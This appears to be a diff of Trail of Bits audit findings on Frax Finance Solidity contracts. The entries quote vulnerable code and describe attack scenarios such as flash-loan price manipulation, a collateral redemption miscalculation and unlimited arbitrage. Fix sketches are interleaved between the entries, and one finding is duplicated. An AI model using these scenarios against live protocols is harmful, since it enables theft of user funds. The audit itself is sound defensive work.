"title": "2. No clear mapping from contracts to tests ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "There are 405 Solidity files within the contracts folder 1 , but there are only 80 files within the test folder 2 . Thus, it is not clear which tests correspond to which contracts. The number of contracts makes it impractical for a developer to run all tests when working on any one contract. Thus, to test a contract effectively, a developer will need to know which tests are specific to that contract. Furthermore, as per TOB-FRSOL-001, we recommend that the tests specific to contract X be run when a push or pull request affects contract X. To apply this recommendation, a mapping from the contracts to their relevant tests is needed. Exploit Scenario Alice, a Frax Finance developer, makes a change to a Frax Solidity contract. Alice is unable to determine the file that should be used to test the contract and deploys the contract untested. The contract is exploited using a bug that would have been revealed by a test. Recommendations Short term, for each contract, produce a list of tests that exercise that contract. If any such list is empty, produce tests for that contract. Having such lists will help facilitate contract testing following a change to it. Long term, as per TOB-FRSOL-001, incorporate unit testing into the CI process by running the tests specific to contract X when a push or pull request affects contract X. Automating the testing process will help ensure the tests are run regularly and consistently. 1 find contracts -name '*.sol' | wc -l 2 find test -type f | wc -l", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "3.
amoMinterBorrow cannot be paused ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The amoMinterBorrow function does not check for any of the paused flags or whether the minter's associated collateral type is enabled. This reduces the FraxPoolV3 custodian's ability to limit the scope of an attack. The relevant code appears in figure 3.1. The custodian can set recollateralizePaused[minter_col_idx] to true if there is a problem with recollateralization, and collateralEnabled[minter_col_idx] to false if there is a problem with the specific collateral type. However, amoMinterBorrow checks for neither of these. // Bypasses the gassy mint->redeem cycle for AMOs to borrow collateral function amoMinterBorrow(uint256 collateral_amount) external onlyAMOMinters { /* Checks the col_idx of the minter as an additional safety check */ uint256 minter_col_idx = IFraxAMOMinter(msg.sender).col_idx(); /* Transfer */ TransferHelper.safeTransfer(collateral_addresses[minter_col_idx], msg.sender, collateral_amount); } Figure 3.1: contracts/Frax/Pools/FraxPoolV3.sol#L552-L559 Exploit Scenario Eve discovers and exploits a bug in an AMO contract. The FraxPoolV3 custodian discovers the attack but is unable to stop it. The FraxPoolV3 owner is required to disable the AMO contracts. This occurs after significant funds have been lost. Recommendations Short term, require recollateralizePaused[minter_col_idx] to be false and collateralEnabled[minter_col_idx] to be true for a call to amoMinterBorrow to succeed. This will help the FraxPoolV3 custodian to limit the scope of an attack. Long term, regularly review all uses of contract modifiers, such as collateralEnabled. Doing so will help to expose bugs like the one described here.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "4. Array updates are not constant time ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "In several places, arrays are allowed to grow without bound, and those arrays are searched linearly. If an array grows too large and the block gas limit is too low, such a search would fail. An example appears in figure 4.1. Minters are pushed to but never popped from minters_array. When a minter is removed from the array, its entry is searched for and then set to 0. Note that the cost of such a search is proportional to the searched-for entry's index within the array. Thus, there will eventually be entries that cannot be removed under the current block gas limits because their positions within the array are too large. function removeMinter(address minter_address) external onlyByOwnGov { require(minter_address != address(0), \"Zero address detected\"); require(minters[minter_address] == true, \"Address nonexistant\"); /* Delete from the mapping */ delete minters[minter_address]; /* 'Delete' from the array by setting the address to 0x0; this will leave a null in the array and keep the indices the same */ for (uint i = 0; i < minters_array.length; i++) { if (minters_array[i] == minter_address) { minters_array[i] = address(0); break; } } emit MinterRemoved(minter_address); } Figure 4.1: contracts/ERC20/__CROSSCHAIN/CrossChainCanonical.sol#L269-L285 Note that occasionally popping values from minters_array is not sufficient to address the issue. An array can be popped from occasionally, yet its size can still be unbounded.
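If stable indices are not required, a constant-time alternative is swap-and-pop with an index mapping; a hedged sketch follows (minterIndex is a hypothetical mapping that would have to be maintained on insertion, and unlike the original code this reorders the array):

mapping(address => uint256) minterIndex; // hypothetical: position of each minter in minters_array

function removeMinter(address minter_address) external onlyByOwnGov {
    require(minters[minter_address] == true, \"Address nonexistant\");
    uint256 i = minterIndex[minter_address];
    address last = minters_array[minters_array.length - 1];
    // Move the last entry into the removed slot, then shrink the array
    minters_array[i] = last;
    minterIndex[last] = i;
    minters_array.pop();
    delete minterIndex[minter_address];
    delete minters[minter_address];
    emit MinterRemoved(minter_address);
}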
+ { + "title": "4. Array updates are not constant time ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "In several places, arrays are allowed to grow without bound, and those arrays are searched linearly. If an array grows too large and the block gas limit is too low, such a search would fail. An example appears in figure 4.1. Minters are pushed to but never popped from minters_array . When a minter is removed from the array, its entry is searched for and then set to 0 . Note that the cost of such a search is proportional to the searched-for entry's index within the array. Thus, there will eventually be entries that cannot be removed under the current block gas limits because their positions within the array are too large. function removeMinter ( address minter_address ) external onlyByOwnGov { require (minter_address != address ( 0 ), \"Zero address detected\" ); require (minters[minter_address] == true , \"Address nonexistant\" ); // Delete from the mapping delete minters[minter_address]; // 'Delete' from the array by setting the address to 0x0 for ( uint i = 0 ; i < minters_array.length; i++){ if (minters_array[i] == minter_address) { minters_array[i] = address ( 0 ); // This will leave a null in the array and keep the indices the same break ; } } emit MinterRemoved (minter_address); } Figure 4.1: contracts/ERC20/__CROSSCHAIN/CrossChainCanonical.sol#L269-L285 Note that occasionally popping values from minters_array is not sufficient to address the issue. An array can be popped from occasionally, yet its size can still be unbounded. A similar problem exists in CrossChainCanonical.sol with respect to bridge_tokens_array . This problem appears to exist in many parts of the codebase. Exploit Scenario Eve tricks Frax Finance into adding her minter to the CrosschainCanonical contract. Frax Finance later decides to remove her minter, but is unable to do so because minters_array has grown too large and block gas limits are too low. Recommendations Short term, enforce the following policy throughout the codebase: an array's size is bounded, or the array is linearly searched, but never both. Arrays that grow without bound can be updated by moving computations, such as the computation of the index that needs to be updated, off-chain. Alternatively, the code that uses the array could be adjusted to eliminate the need for the array or to instead use a linked list. Adopting these changes will help ensure that the success of critical operations is not dependent on block gas limits. Long term, incorporate a check for this problematic code pattern into the CI pipeline. In the medium term, such a check might simply involve regular expressions. In the longer term, use Semgrep for Solidity if or when such support becomes stable. This will help to ensure the problem is not reintroduced into the codebase.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + },
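If stable array indices are not required, one constant-time alternative is swap-and-pop with an index mapping (a sketch; minter_indices is a hypothetical mapping that would be maintained when a minter is added):

    function removeMinter(address minter_address) external onlyByOwnGov {
        require(minters[minter_address] == true, "Address nonexistant");
        delete minters[minter_address];
        uint256 i = minter_indices[minter_address]; // recorded when the minter was added
        uint256 last = minters_array.length - 1;
        if (i != last) {
            minters_array[i] = minters_array[last]; // move the last entry into the gap
            minter_indices[minters_array[i]] = i;
        }
        minters_array.pop(); // O(1); no linear search
        delete minter_indices[minter_address];
        emit MinterRemoved(minter_address);
    }

Because swap-and-pop reorders the array, code that relies on stable indices would instead need the off-chain index computation that the finding recommends.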
+ { + "title": "5. Incorrect calculation of collateral amount in redeemFrax ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The redeemFrax function of the FraxPoolV3 contract multiplies a FRAX amount with the collateral price to calculate the equivalent collateral amount (see the highlights in figure 5.1). This is incorrect. The FRAX amount should be divided by the collateral price instead. Fortunately, in the current deployment of FraxPoolV3 , only stablecoins are used as collateral, and their price is set to 1 (also see issue TOB-FRSOL-009 ). This mitigates the issue, as multiplication and division by one are equivalent. If the collateral price were changed to a value different from 1 , the exploit scenario described below would become possible, enabling users to steal all collateral from the protocol. if (global_collateral_ratio >= PRICE_PRECISION) { // 1-to-1 or overcollateralized collat_out = frax_after_fee .mul(collateral_prices[col_idx]) .div( 10 ** ( 6 + missing_decimals[col_idx])); // PRICE_PRECISION + missing decimals fxs_out = 0 ; } else if (global_collateral_ratio == 0 ) { // Algorithmic fxs_out = frax_after_fee .mul(PRICE_PRECISION) .div(getFXSPrice()); collat_out = 0 ; } else { // Fractional collat_out = frax_after_fee .mul(global_collateral_ratio) .mul(collateral_prices[col_idx]) .div( 10 ** ( 12 + missing_decimals[col_idx])); // PRICE_PRECISION ^2 + missing decimals fxs_out = frax_after_fee .mul(PRICE_PRECISION.sub(global_collateral_ratio)) .div(getFXSPrice()); // PRICE_PRECISIONS CANCEL OUT } Figure 5.1: Part of the redeemFrax function ( FraxPoolV3.sol#412-433 ) When considering the price of an entity X, it is common to think of it as the amount of another entity Y that has a value equivalent to 1 X; the unit of measurement of the price is Y per X. For example, the price of one apple is the number of units of another entity that can be exchanged for one unit of apple. That other entity is usually the local currency. For the US, the price of an apple is the number of US dollars that can be exchanged for an apple: price = $ / apple. 1. Given a price and an amount of X, one can compute the equivalent amount of Y through multiplication: amount_Y = amount_X * price. 2. Given a price and an amount of Y, one can compute the equivalent amount of X through division: amount_X = amount_Y / price. In short, multiply if the known amount and price refer to the same entity; otherwise, divide. The getFRAXInCollateral function correctly follows rule 2 by dividing a FRAX amount by the collateral price to get the equivalent collateral amount (figure 5.2). function getFRAXInCollateral ( uint256 col_idx , uint256 frax_amount ) public view returns ( uint256 ) { return frax_amount.mul(PRICE_PRECISION).div( 10 ** missing_decimals[col_idx]). div(collateral_prices[col_idx]) ; } Figure 5.2: The getFRAXInCollateral function ( FraxPoolV3.sol#242-244 ) Exploit Scenario A collateral price takes on a value other than 1 . This can happen through either a call to setCollateralPrice or future modifications that fetch the price from an oracle (also see issue TOB-FRSOL-009 ). A collateral asset is worth $1,000. Alice mints 1,000 FRAX for 1 unit of collateral. Alice then redeems 1,000 FRAX for 1 million units of collateral ( 1000 * 1000 ). As a result, Alice has stolen around $1 billion from the protocol. If the calculation were correct, Alice would have redeemed her 1,000 FRAX for 1 unit of collateral ( 1000 / 1000 ). Recommendations Short term, in FraxPoolV3.redeemFrax , use the existing getFRAXInCollateral helper function (figure 5.2) to compute the collateral amount that is equivalent to a given FRAX amount. Long term, verify that all calculations involving prices use the above rules 1 and 2 correctly.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + },
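A sketch of the short-term fix to the branches in figure 5.1, expressed with the existing getFRAXInCollateral helper (the algorithmic branch is unchanged and elided):

    if (global_collateral_ratio >= PRICE_PRECISION) {
        // 1-to-1 or overcollateralized: rule 2, divide the FRAX amount by the collateral price
        collat_out = getFRAXInCollateral(col_idx, frax_after_fee);
        fxs_out = 0;
    } else {
        // Fractional: only the collateralized fraction is paid out in collateral
        collat_out = getFRAXInCollateral(col_idx, frax_after_fee.mul(global_collateral_ratio).div(PRICE_PRECISION));
        fxs_out = frax_after_fee.mul(PRICE_PRECISION.sub(global_collateral_ratio)).div(getFXSPrice());
    }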
+ { + "title": "6. spotPriceOHM is vulnerable to manipulation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The OHM_AMO contract uses the Uniswap V2 spot price to calculate the value of the collateral that it holds. This price can be manipulated by making a large trade through the OHM-FRAX pool. An attacker can manipulate the apparent value of collateral and thereby change the collateralization rate at will. FraxPoolV3 appears to contain the most funds at risk, but any contract that uses FRAX.globalCollateralValue is susceptible to a similar attack. (It looks like Pool_USDC has buybacks paused, so it should not be able to burn FXS, at the time of writing.) function spotPriceOHM () public view returns ( uint256 frax_per_ohm_raw , uint256 frax_per_ohm ) { ( uint256 reserve0 , uint256 reserve1 , ) = (UNI_OHM_FRAX_PAIR.getReserves()); // OHM = token0, FRAX = token1 frax_per_ohm_raw = reserve1.div(reserve0); frax_per_ohm = reserve1.mul(PRICE_PRECISION).div(reserve0.mul( 10 ** missing_decimals_ohm)); } Figure 6.1: old_contracts/Misc_AMOs/OHM_AMO.sol#L174-L180 FRAX.globalCollateralValue loops through frax_pools_array , including OHM_AMO , and aggregates collatDollarBalance . The collatDollarBalance for OHM_AMO is calculated using spotPriceOHM and thus is vulnerable to manipulation. function globalCollateralValue() public view returns ( uint256 ) { uint256 total_collateral_value_d18 = 0 ; for ( uint i = 0 ; i < frax_pools_array.length; i++){ // Exclude null addresses if (frax_pools_array[i] != address ( 0 )){ total_collateral_value_d18 = total_collateral_value_d18.add(FraxPool(frax_pools_array[i]).collatDollarBalance()); } } return total_collateral_value_d18; } Figure 6.2: contracts/Frax/Frax.sol#L180-L191 buybackAvailableCollat returns the amount the protocol will buy back if the aggregate value of collateral appears to back each unit of FRAX with more than is required by the current collateral ratio. Since globalCollateralValue is manipulable, the protocol can be artificially forced into buying (burning) FXS shares and paying out collateral. function buybackAvailableCollat () public view returns ( uint256 ) { uint256 total_supply = FRAX.totalSupply(); uint256 global_collateral_ratio = FRAX.global_collateral_ratio(); uint256 global_collat_value = FRAX.globalCollateralValue(); if (global_collateral_ratio > PRICE_PRECISION) global_collateral_ratio = PRICE_PRECISION; // Handles an overcollateralized contract with CR > 1 uint256 required_collat_dollar_value_d18 = (total_supply.mul(global_collateral_ratio)).div(PRICE_PRECISION); // Calculates collateral needed to back each 1 FRAX with $1 of collateral at current collat ratio if (global_collat_value > required_collat_dollar_value_d18) { // Get the theoretical buyback amount uint256 theoretical_bbk_amt = global_collat_value.sub(required_collat_dollar_value_d18); // See how much collateral has been issued this hour uint256 current_hr_bbk = bbkHourlyCum[curEpochHr()]; // Account for the throttling return comboCalcBbkRct(current_hr_bbk, bbkMaxColE18OutPerHour, theoretical_bbk_amt); } else return 0 ; } Figure 6.3: contracts/Frax/Pools/FraxPoolV3.sol#L284-L303 buyBackFxs calculates the amount of FXS to burn from the user, calls burn on the FRAXShares contract, and sends the caller an equivalent dollar amount in USDC. function buyBackFxs ( uint256 col_idx , uint256 fxs_amount , uint256 col_out_min ) external collateralEnabled(col_idx) returns ( uint256 col_out ) { require (buyBackPaused[col_idx] == false , \"Buyback is paused\" ); uint256 fxs_price = getFXSPrice(); uint256 available_excess_collat_dv = buybackAvailableCollat(); // If the total collateral value is higher than the amount required at the current collateral ratio then buy back up to the possible FXS with the desired collateral require (available_excess_collat_dv > 0 , \"Insuf Collat Avail For BBK\" ); // Make sure not to take more than is available uint256 fxs_dollar_value_d18 = fxs_amount.mul(fxs_price).div(PRICE_PRECISION); require (fxs_dollar_value_d18 <= available_excess_collat_dv, \"Insuf Collat Avail For BBK\" ); // Get the equivalent amount of collateral based on the market value of FXS provided uint256 collateral_equivalent_d18 = fxs_dollar_value_d18.mul(PRICE_PRECISION).div(collateral_prices[col_idx]); col_out = collateral_equivalent_d18.div( 10 ** missing_decimals[col_idx]); // In its natural decimals() // Subtract the buyback fee col_out = (col_out.mul(PRICE_PRECISION.sub(buyback_fee[col_idx]))).div(PRICE_PRECISION); // Check for slippage require (col_out >= col_out_min, \"Collateral slippage\" ); // Take in and burn the FXS, then send out the collateral FXS.pool_burn_from( msg.sender , fxs_amount); TransferHelper.safeTransfer(collateral_addresses[col_idx], msg.sender , col_out); // Increment the outbound collateral, in E18, for that hour // Used for buyback throttling bbkHourlyCum[curEpochHr()] += collateral_equivalent_d18; } Figure 6.4: contracts/Frax/Pools/FraxPoolV3.sol#L488-L517 recollateralize takes collateral from a user and gives the user an equivalent amount of FXS, including a bonus. Currently, the bonus_rate is set to 0 , but a nonzero bonus_rate would significantly increase the profitability of an attack. // When the protocol is recollateralizing, we need to give a discount of FXS to hit the new CR target // Thus, if the target collateral ratio is higher than the actual value of collateral, minters get FXS for adding collateral // This function simply rewards anyone that sends collateral to a pool with the same amount of FXS + the bonus rate // Anyone can call this function to recollateralize the protocol and take the extra FXS value from the bonus rate as an arb opportunity function recollateralize( uint256 col_idx, uint256 collateral_amount, uint256 fxs_out_min) external collateralEnabled(col_idx) returns ( uint256 fxs_out) { require (recollateralizePaused[col_idx] == false , \"Recollat is paused\" ); uint256 collateral_amount_d18 = collateral_amount * ( 10 ** missing_decimals[col_idx]); uint256 fxs_price = getFXSPrice(); // Get the amount of FXS actually available (accounts for throttling) uint256 fxs_actually_available = recollatAvailableFxs(); // Calculated the attempted amount of FXS fxs_out = collateral_amount_d18.mul(PRICE_PRECISION.add(bonus_rate).sub(recollat_fee[col_idx]) ).div(fxs_price); // Make sure there is FXS available require (fxs_out <= fxs_actually_available, \"Insuf FXS Avail For RCT\" ); // Check slippage require (fxs_out >= fxs_out_min, \"FXS slippage\" ); // Don't take in more collateral than the pool ceiling for this token allows require (freeCollatBalance(col_idx).add(collateral_amount) <= pool_ceilings[col_idx], \"Pool ceiling\" ); // Take in the collateral and pay out the FXS TransferHelper.safeTransferFrom(collateral_addresses[col_idx], msg.sender , address ( this ), collateral_amount); FXS.pool_mint( msg.sender , fxs_out); // Increment the outbound FXS, in E18 // Used for recollat throttling rctHourlyCum[curEpochHr()] += fxs_out ; } Figure 6.5: contracts/Frax/Pools/FraxPoolV3.sol#L519-L550 Exploit Scenario FraxPoolV3.bonus_rate is nonzero. Using a flash loan, an attacker buys OHM with FRAX, drastically increasing the spot price of OHM. When FraxPoolV3.buyBackFxs is called, the protocol incorrectly determines that FRAX has gained additional collateral. This causes the pool to burn FXS shares and to send the attacker USDC of the equivalent dollar value. The attacker moves the price in the opposite direction and calls recollateralize on the pool, receiving and selling newly minted FXS, including a bonus, for profit. This attack can be carried out until the buyback and recollateralize hourly cap, currently 200,000 units, is reached. Recommendations Short term, take one of the following steps to mitigate this issue: Call FRAX.removePool and remove OHM_AMO . Note, this may cause the protocol to become less collateralized. Call FraxPoolV3.setBbkRctPerHour and set bbkMaxColE18OutPerHour and rctMaxFxsOutPerHour to 0 . Calling toggleMRBR to pause USDC buybacks and recollateralizations would have the same effect. The implications of this mitigation on the long-term sustainability of the protocol are not clear. Long term, do not use the spot price to determine collateral value. Instead, use a time-weighted average price (TWAP) or an oracle such as Chainlink. If a TWAP is used, ensure that the underlying pool is highly liquid and not easily manipulated. Additionally, create a rigorous process to onboard collateral since an exploit of this nature could destabilize the system. References samczsun, \"So you want to use a price oracle\" euler-xyz/uni-v3-twap-manipulation", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + },
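As one illustration of the long-term recommendation, OHM could be valued through a price feed instead of pool reserves. A sketch, assuming the codebase's SafeMath style; the feed, its address, and the staleness bound are assumptions, not part of the audited code:

    AggregatorV3Interface public ohmUsdFeed; // hypothetical OHM/USD Chainlink feed
    uint256 public constant MAX_ORACLE_DELAY = 1 hours; // illustrative staleness bound

    function ohmPriceE6() public view returns (uint256) {
        (uint80 roundID, int256 price, , uint256 updatedAt, uint80 answeredInRound) = ohmUsdFeed.latestRoundData();
        require(price > 0, "Invalid oracle price");
        require(updatedAt != 0 && answeredInRound >= roundID, "Stale round");
        require(block.timestamp - updatedAt <= MAX_ORACLE_DELAY, "Oracle too old");
        return uint256(price).mul(PRICE_PRECISION).div(10 ** uint256(ohmUsdFeed.decimals()));
    }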
+ { + "title": "7. Return values of the Chainlink oracle are not validated ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The latestRoundData function returns a signed integer that is coerced to an unsigned integer without checking that the value is a positive integer. An overflow (e.g., uint(-1) ) would drastically misrepresent the price and cause unexpected behavior. In addition, FraxPoolV3 does not validate the completion and recency of the round data, permitting stale price data that does not reflect recent changes. function getFRAXPrice() public view returns ( uint256 ) { ( , int price, , , ) = priceFeedFRAXUSD.latestRoundData(); return uint256 (price).mul(PRICE_PRECISION).div( 10 ** chainlink_frax_usd_decimals); } function getFXSPrice() public view returns ( uint256 ) { ( , int price, , , ) = priceFeedFXSUSD.latestRoundData(); return uint256 (price).mul(PRICE_PRECISION).div( 10 ** chainlink_fxs_usd_decimals); } Figure 7.1: contracts/Frax/Pools/FraxPoolV3.sol#231-239 An older version of Chainlink's oracle interface has a similar function, latestAnswer . When this function is used, the return value should be checked to ensure that it is a positive integer. However, round information does not need to be checked because latestAnswer returns only price data. Recommendations Short term, add a check to latestRoundData and similar functions to verify that values are non-negative before converting them to unsigned integers, and add an invariant that checks that the round has finished and that the price data is from the current round: require(updatedAt != 0 && answeredInRound == roundID) . Long term, define a minimum update threshold and add the following check: require((block.timestamp - updatedAt <= minThreshold) && (answeredInRound == roundID)) . Furthermore, use consistent interfaces instead of mixing different versions. References Chainlink AggregatorV3Interface", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + },
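A sketch of getFXSPrice with the recommended checks applied (minThreshold is a new value introduced per the long-term recommendation; its magnitude here is illustrative):

    uint256 public minThreshold = 1 hours; // maximum acceptable oracle age (illustrative)

    function getFXSPrice() public view returns (uint256) {
        (uint80 roundID, int256 price, , uint256 updatedAt, uint80 answeredInRound) = priceFeedFXSUSD.latestRoundData();
        require(price > 0, "Chainlink price <= 0");
        require(updatedAt != 0 && answeredInRound == roundID, "Incomplete or stale round");
        require(block.timestamp - updatedAt <= minThreshold, "Price data too old");
        return uint256(price).mul(PRICE_PRECISION).div(10 ** chainlink_fxs_usd_decimals);
    }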
+ { + "title": "8. Unlimited arbitrage in CCFrax1to1AMM ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The CCFrax1to1AMM contract implements an automated market maker (AMM) with a constant price and zero slippage. It is a constant sum AMM that maintains the invariant k = x + y, where x and y are the token balances; k must remain constant during swaps (ignoring fees). Constant sum AMMs are impractical because they are vulnerable to unlimited arbitrage. If the price difference of the AMM's tokens in external markets is large enough, the most profitable arbitrage strategy is to buy the total reserve of the more expensive token from the AMM, leaving the AMM entirely imbalanced. Other AMMs like Uniswap and Curve prevent unlimited arbitrage by making the price depend on the reserves. This limits profits from arbitrage to a fraction of the total reserves, as the price will eventually reach a point at which the arbitrage opportunity disappears. No such limit exists in the CCFrax1to1AMM contract. While arbitrage opportunities are somewhat limited by the token caps, fees, and gas prices, unlimited arbitrage is always possible once the reserves or the difference between the FRAX price and the token price becomes large enough. While token_price swings are limited by the price_tolerance parameter, frax_price swings are not limited. Exploit Scenario The CCFrax1to1AMM contract is deployed, and price_tolerance is set to 0.05. A token is whitelisted with a token_cap of 100,000 and a swap_fee of 0.0004. A user transfers 100,000 FRAX to the AMM. The price of the token in an external market becomes 0.995, the minimum at which the AMM allows swaps, and the price of FRAX in an external market becomes 1.005. Alice buys (or takes out a flash loan of) $100,000 worth of the token in the external market. Alice swaps all of her tokens for FRAX with the AMM and then sells all of her FRAX in the external market, making a profit of $960. No FRAX remains in the AMM. This scenario is conservative, as it assumes a balance of only 100,000 FRAX and a frax_price of 1.005. As frax_price and the balance increase, the arbitrage profit increases. Recommendations Short term, do not deploy CCFrax1to1AMM and do not fund any existing deployments with significant amounts. Those funds will be at risk of being drained through arbitrage. Long term, when providing stablecoin-to-stablecoin liquidity, use a Curve pool or another proven and audited implementation of the stableswap invariant.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "9. Collateral prices are assumed to always be $1 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "In the FraxPoolV3 contract, the setCollateralPrice function sets collateral prices and stores them in the collateral_prices mapping. As of December 13, 2021, collateral prices are set to $1 for all collateral types in the deployed version of the FraxPoolV3 contract. Currently, only stablecoins are used as collateral within the Frax Protocol. For those stablecoins, $1 is an appropriate price approximation, at most times. However, when the actual price of the collateral differs enough from $1, users could choose to drain value from the protocol through arbitrage. Conversely, during such price fluctuations, other users who are not aware that FraxPoolV3 assumes collateral prices are always $1 can receive less value than expected. Collateral tokens that are not pegged to a specific value, like ETH or WBTC, cannot currently be used safely within FraxPoolV3 . Their prices are too volatile, and repeatedly calling setCollateralPrice is not a feasible solution to keeping their prices up to date. Exploit Scenario The price of FEI, one of the stablecoins collateralizing the Frax Protocol, changes to $0.99. Alice, a user, can still mint FRAX/FXS as if the price of FEI were $1. Ignoring fees, Alice can buy 1 million FEI for $990,000, mint 1 million FRAX/FXS with the 1 million FEI, and sell the 1 million FRAX/FXS for $1 million, making $10,000 in the process. As a result, the Frax Protocol loses $10,000. If the price of FEI changes to $1.01, Bob would expect that he can exchange his 1 million FEI for 1.01 million FRAX/FXS. Since FraxPoolV3 is not aware of the actual price of FEI, Bob receives only 1 million FRAX/FXS, incurring a 1% loss. Recommendations Short term, document the arbitrage opportunities described above. Warn users that they could lose funds if collateral prices differ from $1. Disable the option to set collateral prices to values not equal to $1. Long term, modify the FraxPoolV3 contract so that it fetches collateral prices from a price oracle.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + },
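One way to implement the short-term recommendation of disabling non-$1 prices (a sketch; the function signature is assumed from the finding's description):

    function setCollateralPrice(uint256 col_idx, uint256 _new_price) external onlyByOwnGov {
        // Until a price oracle is integrated, reject any price other than the documented $1 assumption
        require(_new_price == PRICE_PRECISION, "Only $1 collateral prices are supported");
        collateral_prices[col_idx] = _new_price;
    }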
+ { + "title": "10. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "Frax Finance has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the Frax Finance contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "11. Users are unable to limit the amount of collateral paid to FraxPoolV3 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The amount of collateral and FXS that is paid by the user in mintFrax is dynamically computed from the collateral ratio and price. These parameters can change between transaction creation and transaction execution. Users currently have no way to ensure that the paid amounts are still within acceptable limits at the time of transaction execution. Exploit Scenario Alice wants to call mintFrax . In the time between when the transaction is broadcast and executed, the global collateral ratio, collateral, and/or FXS prices change in such a way that Alice's minting operation is no longer profitable for her. The minting operation is still executed, and Alice loses funds. Recommendations Short term, add the maxCollateralIn and maxFXSIn parameters to mintFrax , enabling users to make the transaction revert if the amount of collateral and FXS that they would have to pay is above acceptable limits. Long term, always add such limits to give users the ability to prevent unacceptably large input amounts and unacceptably small output amounts when those amounts are dynamically computed.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + },
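A sketch of the recommended user-supplied bounds; the existing mintFrax logic is elided, and the names of the computed input amounts are assumptions for illustration:

    function mintFrax(
        uint256 col_idx,
        uint256 frax_amt,
        uint256 frax_out_min,
        uint256 maxCollateralIn, // new: upper bound on collateral the user will pay
        uint256 maxFXSIn         // new: upper bound on FXS the user will pay
    ) external returns (uint256 total_frax_mint, uint256 collat_needed, uint256 fxs_needed) {
        // ... existing computation of collat_needed and fxs_needed ...
        require(collat_needed <= maxCollateralIn, "Collateral slippage");
        require(fxs_needed <= maxFXSIn, "FXS slippage");
        // ... take in funds and mint as before ...
    }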
+ { + "title": "12. Incorrect default price tolerance in CCFrax1to1AMM ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The price_tolerance state variable of the CCFrax1to1AMM contract is set to 50,000, which, with the contract's fixed-point scaling factor of 10^6, corresponds to 0.05. This is inconsistent with the variable's inline comment, which indicates the number 5,000, corresponding to 0.005. A price tolerance of 0.05 is probably too high and can lead to unacceptable arbitrage activities; this suggests that price_tolerance should be set to the value indicated in the code comment. uint256 public price_tolerance = 50000 ; // E6. 5000 = .995 to 1.005 Figure 12.1: The price_tolerance state variable ( CCFrax1to1AMM.sol#56 ) Exploit Scenario This issue exacerbates the exploit scenario presented in issue TOB-FRSOL-008 . Given that scenario, but with a price tolerance of 50,000, Alice is able to gain $5,459 through arbitrage. A higher price tolerance leads to higher arbitrage profits. Recommendations Short term, set the price tolerance to 5,000 both in the code and on the deployed contract. Long term, ensure that comments are in sync with the code and that constants are correct.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + },
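The corrected declaration would simply match the comment:

    uint256 public price_tolerance = 5000; // E6. 5000 = .995 to 1.005

On the already-deployed contract, the owner would apply the same value through the contract's tolerance setter, assuming one is exposed.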
